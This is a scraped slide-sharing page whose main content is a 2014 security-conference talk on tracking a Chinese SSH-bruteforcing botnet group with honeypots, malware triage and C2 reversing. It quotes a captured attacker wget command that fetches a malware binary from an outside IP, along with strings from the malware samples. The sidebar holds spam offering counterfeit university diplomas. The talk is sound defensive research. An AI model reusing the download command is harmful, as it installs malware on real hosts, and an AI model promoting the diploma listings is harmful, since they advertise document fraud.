Playing with fuzz bunch and danderspritz
Playing with fuzz bunch and danderspritzPlaying with fuzz bunch and danderspritz
Playing with fuzz bunch and danderspritz
 
2023 NCIT: Introduction to Intrusion Detection
2023 NCIT: Introduction to Intrusion Detection2023 NCIT: Introduction to Intrusion Detection
2023 NCIT: Introduction to Intrusion Detection
 
Pentesting Tips: Beyond Automated Testing
Pentesting Tips: Beyond Automated TestingPentesting Tips: Beyond Automated Testing
Pentesting Tips: Beyond Automated Testing
 
How to hack or what is ethical hacking
How to hack or what is ethical hackingHow to hack or what is ethical hacking
How to hack or what is ethical hacking
 
AlienVault Brute Force Attacks- Keeping the Bots at Bay with AlienVault USM +...
AlienVault Brute Force Attacks- Keeping the Bots at Bay with AlienVault USM +...AlienVault Brute Force Attacks- Keeping the Bots at Bay with AlienVault USM +...
AlienVault Brute Force Attacks- Keeping the Bots at Bay with AlienVault USM +...
 
Web hacking 1.0
Web hacking 1.0Web hacking 1.0
Web hacking 1.0
 
Information about malwares and Attacks.pptx
Information about malwares and Attacks.pptxInformation about malwares and Attacks.pptx
Information about malwares and Attacks.pptx
 
FUEL_USERS_GROUP
FUEL_USERS_GROUPFUEL_USERS_GROUP
FUEL_USERS_GROUP
 
Detecting Intrusions and Malware - Eric Vanderburg - JurInnov
Detecting Intrusions and Malware - Eric Vanderburg - JurInnovDetecting Intrusions and Malware - Eric Vanderburg - JurInnov
Detecting Intrusions and Malware - Eric Vanderburg - JurInnov
 
Advanced Persistent Threats
Advanced Persistent ThreatsAdvanced Persistent Threats
Advanced Persistent Threats
 
BSidesJXN 2016: Finding a Company's BreakPoint
BSidesJXN 2016: Finding a Company's BreakPointBSidesJXN 2016: Finding a Company's BreakPoint
BSidesJXN 2016: Finding a Company's BreakPoint
 
Anti-virus Mechanisms and Various Ways to Bypass Antivirus detection
Anti-virus Mechanisms and Various Ways to Bypass Antivirus detectionAnti-virus Mechanisms and Various Ways to Bypass Antivirus detection
Anti-virus Mechanisms and Various Ways to Bypass Antivirus detection
 
Python-Assisted Red-Teaming Operation
Python-Assisted Red-Teaming OperationPython-Assisted Red-Teaming Operation
Python-Assisted Red-Teaming Operation
 

Recently uploaded

一比一原版(UofM毕业证)明尼苏达大学毕业证成绩单
一比一原版(UofM毕业证)明尼苏达大学毕业证成绩单一比一原版(UofM毕业证)明尼苏达大学毕业证成绩单
一比一原版(UofM毕业证)明尼苏达大学毕业证成绩单
ewymefz
 
一比一原版(Coventry毕业证书)考文垂大学毕业证如何办理
一比一原版(Coventry毕业证书)考文垂大学毕业证如何办理一比一原版(Coventry毕业证书)考文垂大学毕业证如何办理
一比一原版(Coventry毕业证书)考文垂大学毕业证如何办理
74nqk8xf
 
一比一原版(UPenn毕业证)宾夕法尼亚大学毕业证成绩单
一比一原版(UPenn毕业证)宾夕法尼亚大学毕业证成绩单一比一原版(UPenn毕业证)宾夕法尼亚大学毕业证成绩单
一比一原版(UPenn毕业证)宾夕法尼亚大学毕业证成绩单
ewymefz
 
Criminal IP - Threat Hunting Webinar.pdf
Criminal IP - Threat Hunting Webinar.pdfCriminal IP - Threat Hunting Webinar.pdf
Criminal IP - Threat Hunting Webinar.pdf
Criminal IP
 
一比一原版(UofS毕业证书)萨省大学毕业证如何办理
一比一原版(UofS毕业证书)萨省大学毕业证如何办理一比一原版(UofS毕业证书)萨省大学毕业证如何办理
一比一原版(UofS毕业证书)萨省大学毕业证如何办理
v3tuleee
 
The affect of service quality and online reviews on customer loyalty in the E...
The affect of service quality and online reviews on customer loyalty in the E...The affect of service quality and online reviews on customer loyalty in the E...
The affect of service quality and online reviews on customer loyalty in the E...
jerlynmaetalle
 
一比一原版(BCU毕业证书)伯明翰城市大学毕业证如何办理
一比一原版(BCU毕业证书)伯明翰城市大学毕业证如何办理一比一原版(BCU毕业证书)伯明翰城市大学毕业证如何办理
一比一原版(BCU毕业证书)伯明翰城市大学毕业证如何办理
dwreak4tg
 
Levelwise PageRank with Loop-Based Dead End Handling Strategy : SHORT REPORT ...
Levelwise PageRank with Loop-Based Dead End Handling Strategy : SHORT REPORT ...Levelwise PageRank with Loop-Based Dead End Handling Strategy : SHORT REPORT ...
Levelwise PageRank with Loop-Based Dead End Handling Strategy : SHORT REPORT ...
Subhajit Sahu
 
Data_and_Analytics_Essentials_Architect_an_Analytics_Platform.pptx
Data_and_Analytics_Essentials_Architect_an_Analytics_Platform.pptxData_and_Analytics_Essentials_Architect_an_Analytics_Platform.pptx
Data_and_Analytics_Essentials_Architect_an_Analytics_Platform.pptx
AnirbanRoy608946
 
Best best suvichar in gujarati english meaning of this sentence as Silk road ...
Best best suvichar in gujarati english meaning of this sentence as Silk road ...Best best suvichar in gujarati english meaning of this sentence as Silk road ...
Best best suvichar in gujarati english meaning of this sentence as Silk road ...
AbhimanyuSinha9
 
Q1’2024 Update: MYCI’s Leap Year Rebound
Q1’2024 Update: MYCI’s Leap Year ReboundQ1’2024 Update: MYCI’s Leap Year Rebound
Q1’2024 Update: MYCI’s Leap Year Rebound
Oppotus
 
My burning issue is homelessness K.C.M.O.
My burning issue is homelessness K.C.M.O.My burning issue is homelessness K.C.M.O.
My burning issue is homelessness K.C.M.O.
rwarrenll
 
【社内勉強会資料_Octo: An Open-Source Generalist Robot Policy】
【社内勉強会資料_Octo: An Open-Source Generalist Robot Policy】【社内勉強会資料_Octo: An Open-Source Generalist Robot Policy】
【社内勉強会資料_Octo: An Open-Source Generalist Robot Policy】
NABLAS株式会社
 
原版制作(swinburne毕业证书)斯威本科技大学毕业证毕业完成信一模一样
原版制作(swinburne毕业证书)斯威本科技大学毕业证毕业完成信一模一样原版制作(swinburne毕业证书)斯威本科技大学毕业证毕业完成信一模一样
原版制作(swinburne毕业证书)斯威本科技大学毕业证毕业完成信一模一样
u86oixdj
 
一比一原版(UniSA毕业证书)南澳大学毕业证如何办理
一比一原版(UniSA毕业证书)南澳大学毕业证如何办理一比一原版(UniSA毕业证书)南澳大学毕业证如何办理
一比一原版(UniSA毕业证书)南澳大学毕业证如何办理
slg6lamcq
 
Malana- Gimlet Market Analysis (Portfolio 2)
Malana- Gimlet Market Analysis (Portfolio 2)Malana- Gimlet Market Analysis (Portfolio 2)
Malana- Gimlet Market Analysis (Portfolio 2)
TravisMalana
 
Adjusting OpenMP PageRank : SHORT REPORT / NOTES
Adjusting OpenMP PageRank : SHORT REPORT / NOTESAdjusting OpenMP PageRank : SHORT REPORT / NOTES
Adjusting OpenMP PageRank : SHORT REPORT / NOTES
Subhajit Sahu
 
Ch03-Managing the Object-Oriented Information Systems Project a.pdf
Ch03-Managing the Object-Oriented Information Systems Project a.pdfCh03-Managing the Object-Oriented Information Systems Project a.pdf
Ch03-Managing the Object-Oriented Information Systems Project a.pdf
haila53
 
哪里卖(usq毕业证书)南昆士兰大学毕业证研究生文凭证书托福证书原版一模一样
哪里卖(usq毕业证书)南昆士兰大学毕业证研究生文凭证书托福证书原版一模一样哪里卖(usq毕业证书)南昆士兰大学毕业证研究生文凭证书托福证书原版一模一样
哪里卖(usq毕业证书)南昆士兰大学毕业证研究生文凭证书托福证书原版一模一样
axoqas
 
Data Centers - Striving Within A Narrow Range - Research Report - MCG - May 2...
Data Centers - Striving Within A Narrow Range - Research Report - MCG - May 2...Data Centers - Striving Within A Narrow Range - Research Report - MCG - May 2...
Data Centers - Striving Within A Narrow Range - Research Report - MCG - May 2...
pchutichetpong
 

Recently uploaded (20)

一比一原版(UofM毕业证)明尼苏达大学毕业证成绩单
一比一原版(UofM毕业证)明尼苏达大学毕业证成绩单一比一原版(UofM毕业证)明尼苏达大学毕业证成绩单
一比一原版(UofM毕业证)明尼苏达大学毕业证成绩单
 
一比一原版(Coventry毕业证书)考文垂大学毕业证如何办理
一比一原版(Coventry毕业证书)考文垂大学毕业证如何办理一比一原版(Coventry毕业证书)考文垂大学毕业证如何办理
一比一原版(Coventry毕业证书)考文垂大学毕业证如何办理
 
一比一原版(UPenn毕业证)宾夕法尼亚大学毕业证成绩单
一比一原版(UPenn毕业证)宾夕法尼亚大学毕业证成绩单一比一原版(UPenn毕业证)宾夕法尼亚大学毕业证成绩单
一比一原版(UPenn毕业证)宾夕法尼亚大学毕业证成绩单
 
Criminal IP - Threat Hunting Webinar.pdf
Criminal IP - Threat Hunting Webinar.pdfCriminal IP - Threat Hunting Webinar.pdf
Criminal IP - Threat Hunting Webinar.pdf
 
一比一原版(UofS毕业证书)萨省大学毕业证如何办理
一比一原版(UofS毕业证书)萨省大学毕业证如何办理一比一原版(UofS毕业证书)萨省大学毕业证如何办理
一比一原版(UofS毕业证书)萨省大学毕业证如何办理
 
The affect of service quality and online reviews on customer loyalty in the E...
The affect of service quality and online reviews on customer loyalty in the E...The affect of service quality and online reviews on customer loyalty in the E...
The affect of service quality and online reviews on customer loyalty in the E...
 
一比一原版(BCU毕业证书)伯明翰城市大学毕业证如何办理
一比一原版(BCU毕业证书)伯明翰城市大学毕业证如何办理一比一原版(BCU毕业证书)伯明翰城市大学毕业证如何办理
一比一原版(BCU毕业证书)伯明翰城市大学毕业证如何办理
 
Levelwise PageRank with Loop-Based Dead End Handling Strategy : SHORT REPORT ...
Levelwise PageRank with Loop-Based Dead End Handling Strategy : SHORT REPORT ...Levelwise PageRank with Loop-Based Dead End Handling Strategy : SHORT REPORT ...
Levelwise PageRank with Loop-Based Dead End Handling Strategy : SHORT REPORT ...
 
Data_and_Analytics_Essentials_Architect_an_Analytics_Platform.pptx
Data_and_Analytics_Essentials_Architect_an_Analytics_Platform.pptxData_and_Analytics_Essentials_Architect_an_Analytics_Platform.pptx
Data_and_Analytics_Essentials_Architect_an_Analytics_Platform.pptx
 
Best best suvichar in gujarati english meaning of this sentence as Silk road ...
Best best suvichar in gujarati english meaning of this sentence as Silk road ...Best best suvichar in gujarati english meaning of this sentence as Silk road ...
Best best suvichar in gujarati english meaning of this sentence as Silk road ...
 
Q1’2024 Update: MYCI’s Leap Year Rebound
Q1’2024 Update: MYCI’s Leap Year ReboundQ1’2024 Update: MYCI’s Leap Year Rebound
Q1’2024 Update: MYCI’s Leap Year Rebound
 
My burning issue is homelessness K.C.M.O.
My burning issue is homelessness K.C.M.O.My burning issue is homelessness K.C.M.O.
My burning issue is homelessness K.C.M.O.
 
【社内勉強会資料_Octo: An Open-Source Generalist Robot Policy】
【社内勉強会資料_Octo: An Open-Source Generalist Robot Policy】【社内勉強会資料_Octo: An Open-Source Generalist Robot Policy】
【社内勉強会資料_Octo: An Open-Source Generalist Robot Policy】
 
原版制作(swinburne毕业证书)斯威本科技大学毕业证毕业完成信一模一样
原版制作(swinburne毕业证书)斯威本科技大学毕业证毕业完成信一模一样原版制作(swinburne毕业证书)斯威本科技大学毕业证毕业完成信一模一样
原版制作(swinburne毕业证书)斯威本科技大学毕业证毕业完成信一模一样
 
一比一原版(UniSA毕业证书)南澳大学毕业证如何办理
一比一原版(UniSA毕业证书)南澳大学毕业证如何办理一比一原版(UniSA毕业证书)南澳大学毕业证如何办理
一比一原版(UniSA毕业证书)南澳大学毕业证如何办理
 
Malana- Gimlet Market Analysis (Portfolio 2)
Malana- Gimlet Market Analysis (Portfolio 2)Malana- Gimlet Market Analysis (Portfolio 2)
Malana- Gimlet Market Analysis (Portfolio 2)
 
Adjusting OpenMP PageRank : SHORT REPORT / NOTES
Adjusting OpenMP PageRank : SHORT REPORT / NOTESAdjusting OpenMP PageRank : SHORT REPORT / NOTES
Adjusting OpenMP PageRank : SHORT REPORT / NOTES
 
Ch03-Managing the Object-Oriented Information Systems Project a.pdf
Ch03-Managing the Object-Oriented Information Systems Project a.pdfCh03-Managing the Object-Oriented Information Systems Project a.pdf
Ch03-Managing the Object-Oriented Information Systems Project a.pdf
 
哪里卖(usq毕业证书)南昆士兰大学毕业证研究生文凭证书托福证书原版一模一样
哪里卖(usq毕业证书)南昆士兰大学毕业证研究生文凭证书托福证书原版一模一样哪里卖(usq毕业证书)南昆士兰大学毕业证研究生文凭证书托福证书原版一模一样
哪里卖(usq毕业证书)南昆士兰大学毕业证研究生文凭证书托福证书原版一模一样
 
Data Centers - Striving Within A Narrow Range - Research Report - MCG - May 2...
Data Centers - Striving Within A Narrow Range - Research Report - MCG - May 2...Data Centers - Striving Within A Narrow Range - Research Report - MCG - May 2...
Data Centers - Striving Within A Narrow Range - Research Report - MCG - May 2...
 

BSidesCharleston2014 - Ballin on a Budget: Tracking Chinese Malware Campaigns on the Cheap

  • 1. Ballin on a Budget Tracking Chinese threat actors on the cheap Andrew Morris
  • 2. a/s/l? • Andrew Morris • Security Engineer, iSEC Partners • Twitter - @Andrew___Morris • Email - andrew@morris.guru
  • 3. Overview • I’m going to tell you how I tracked a group of threat actors • I’m going to show you how you can too
  • 5. wtf is threat intel • Gathering intelligence on your adversaries (or bad guys in general) • Predicting and preventing attacks before they happen
  • 8. What we can’t do • As ballers on budgets, we don’t have access to a lot of good data • I’m assuming we do not have access to IR artifacts from targeted compromises • So we’re going to focus on mass attacks targeting the entire internet • We’re only going to track dumb groups with poor opsec • Today we’ll focus on a group that spreads malware via crappy SSH passwords
  • 9. How do you threat intelligence? • Set up a network of vulnerable machines exposed to the internet • Monitor them for attacks • Aggregate data • Locate, secure, and analyze artifacts • Locate key adversary infrastructure • ?????? • Profit!
  • 10. How to ball, on a budget • Setting up infrastructure - honeypots • Monitoring attacks - management interface, log review • Locating a group of attackers - Scraping their web servers • Figuring out who they are - Analyzing capabilities, correlating data, securing artifacts • Tracking their targets - Get creative! • Implementing defenses - Firewall rules, indicators, TTP write-ups
  • 11. Quick Malware Primer • Most malware uses the conventional C2 (command and control) model • Lots of botnets are used to perform DDOS (distributed denial of service) attacks
  • 12.
  • 13. Our targets • Guess passwords via SSH • uname -a • wget malware.run
  • 14. Step 2: Setting up Infrastructure
  • 16. What is a honeypot? • An intentionally vulnerable server or application that serves no business purpose • It’s only purpose is to attract attention of attackers
  • 17. Step 1 - Cheap Hosting • CloudAtCost • Pros: CHEAP - $35 dollar one time fee for a machine FOREVER • Cons: Crappy uptime, slow, unreliable
  • 18. Step 1.1 - OPSEC • Don’t reuse passwords • Don’t put any data on the machine • Don’t put anything personally identifiable on the machine • Assume the machine will be compromised at any moment
  • 19. Step 2 - Management • ThreatStream released an awesome open source centralized honeypot monitor called MHN (Managed Honey Network) • Looks like this
  • 20.
  • 21. Kippo • SSH Honeypot • Can record attacker sessions • Can grab artifacts attackers attempt to download with wget • Configure certain usernames and passwords
  • 22. Let the attacks begin!
  • 23. Data Analytics: Ballin on a Budget style # grep 'login attempt' * | cut -d' ' -f9 | sort | uniq -c | sort -n | tail -n25 | tac Top 25 passwords being used against your infrastructure?
  • 24. Data Analytics: Ballin on a Budget style (cont’d) # grep SSHService * | cut -d']' -f1 | cut -d',' -f3 | sort | uniq -c | sort -n | tail -n25 | tac Top 25 attacker IP addresses
  • 25. Tracker Real-time Alerting analytics: Ballin on a budget style https://github.com/andrew-morris/tracker/
  • 26. Quick recap • We learned what threat intel is • We learned how to set up and operate infrastructure
  • 27. Part 3: Locating the Group
  • 29. root@mgmt.muXXXXXXXXX.com:~# wget -O /etc/run_second=$q http://60.173.X.X:8080/14.17 --2014-08-07 10:25:11-- http:///etc/run_second=$q Connecting to None:80... connected. HTTP request sent, awaiting response... Credit to MalwareMustDie
  • 30. • Do some internet recon to see if anyone’s seen the binaries before • Search Google, VirusTotal, Malwr, etc for the md5 • That being said… this still gets me giddy
  • 31. what if I suck at reversing tho
  • 33. Malware Analysis: Ballin on a budget style • Use malwr.com and virustotal.com
  • 34.
  • 35. Part 4: CHUILANG aka a group I’ve been tracking
  • 36. Who I’m working on • I was getting hit a lot by a particular group • I secured some of their malware samples
  • 38. 1.exe: PE32 executable for MS Windows (GUI) Intel 80386 32-bit 14.17: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, stripped 183.60: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, not stripped 445.rar: RAR archive data, v1d, os: Win32 5900.rar: RAR archive data, v1d, os: Win32 Freebsd: ELF 32-bit LSB executable, Intel 80386, version 1 (FreeBSD), statically linked, for FreeBSD 8.4, not stripped L24_36000: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, not stripped SSHSecureShellClient-3[1][1].2.9.zip: Zip archive data, at least v2.0 to extract elf: directory elf.tar.gz: POSIX tar archive (GNU) putty.exe: PE32 executable for MS Windows (GUI) Intel 80386 32-bit tcpwra: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, stripped xpoer: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, stripped xsyer: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, stripped ºì³¾Íø°²445Éø͸¹¤¾ß°ü.rar: RAR archive data, v1d, os: Win32 命令提示符.exe 入侵前需要 启的服务.bat FTP下载命令.txt SMB Connect OK! Make SMB Connection error:%d MS08-067 Exploit for CN by EMM@ph4nt0m.org %sIPC$ pipebrowser EMM! B041
  • 39. Reversing • Reversing this malware is a talk in itself • I suck at reversing so don’t listen to anything I tell you • I’ll post the IDB files on my github soon • Sometimes you don’t have to reverse anything
  • 40. Analysis Dropped a couple other binaries Added itself to startup The usual Contained DDOS capability Function names like “SYNFLOOD”, “UDPFLOOD”, etc
  • 41. Traffic I see…. IP addresses?
  • 43. # geo [+] IP Address: 202.102.199.68 Country: China Region: 01 City: Hefei Coordinates: 31.86390,117.28080 [+] IP Address: 218.104.78.2 Country: China Region: 01 City: Hefei Coordinates: 31.86390,117.28080 [+] IP Address: 211.138.180.2 Country: China Region: 01 City: Hefei Coordinates: 31.86390,117.28080 [+] IP Address: 211.91.88.129 Country: China Region: 22 City: Beijing Coordinates: 39.92890,116.38830 [+] IP Address: 202.38.64.1 Country: China Region: 01 City: Hefei Coordinates: 31.86390,117.28080 [+] IP Address: 58.242.2.2 Country: China Region: 01 City: Hefei Coordinates: 31.86390,117.28080 [+] IP Address: 202.102.200.101 Country: China Region: 01 City: Hefei Coordinates: 31.86390,117.28080 [+] IP Address: 202.102.213.68 Country: China Region: 01 City: Hefei Coordinates: 31.86390,117.28080 [+] IP Address: 202.102.192.68 Country: China Region: 01 City: Hefei Coordinates: 31.86390,117.28080 [+] IP Address: 61.132.163.68 Country: China Region: 01 City: Hefei Coordinates: 31.86390,117.28080 andrew$ geo 8.8.8.8 [+] IP Address: 8.8.8.8 Country: United States Region: CA City: Mountain View Coordinates: 37.38600,-122.08380 Geographical Correlation Engine: Ballin on a budget style
  • 44. Who are these IPs? CartoDB is AWESOME
  • 45. What are they? • DNS servers • Backbone routers • Etc
  • 46. C2 traffic • Those IPs were their DDOS targets • They were blasting instructions from the C2 • Let’s build our own client!
  • 47. Step 1: Spend hours staring at Wireshark Step 2: Try not to kill yourself
  • 50. Honeypot > Identifying threats > Tracking targets
  • 51. Recap! • We’ve captured malware • Analyzed it to identify capabilities • Reversed the protocol to identify the groups targets in real time
  • 53. End result? • Real-time tracking of the group’s targets, as they target them • Malware artifacts • C2 IP addresses to block from your network
  • 54. Summary of the Group • Based in China • Not advanced • Use easily guessable credentials and 6 year old exploits (MS08_067) • Goals: Build botnet to DDOS people • Somewhat smart about targeting
  • 55. Closing Notes The majority of this intel was gathered from one piece of malware from one campaign There are lots of these campaigns and attacks occurring at any moment You just need to find them
  • 56. TO DO! • Track more of these C2s • Figure out how to identify other compromised clients • Setup automated notification system to alert admins that they will be targeted • Setup live-updating map of their targets
  • 57. • Threat intelligence isn’t that hard • It’s easy to ball on a budget • Get out there and track some targets! • Don’t forget to share your info!
  • 58. Credit • MalwareMustDie - @malwaremustdie • Cartodb - cartodb.com • Malwr - malwr.com • VirusTotal - virustotal.com • CloudAtCost - cloudatcost.com • ThreatStream MHN - github.com/threatstream/mhn • Rob Blody (gir489) for helping me reverse some malware samples • Nat Puffer for getting me interested in this stuff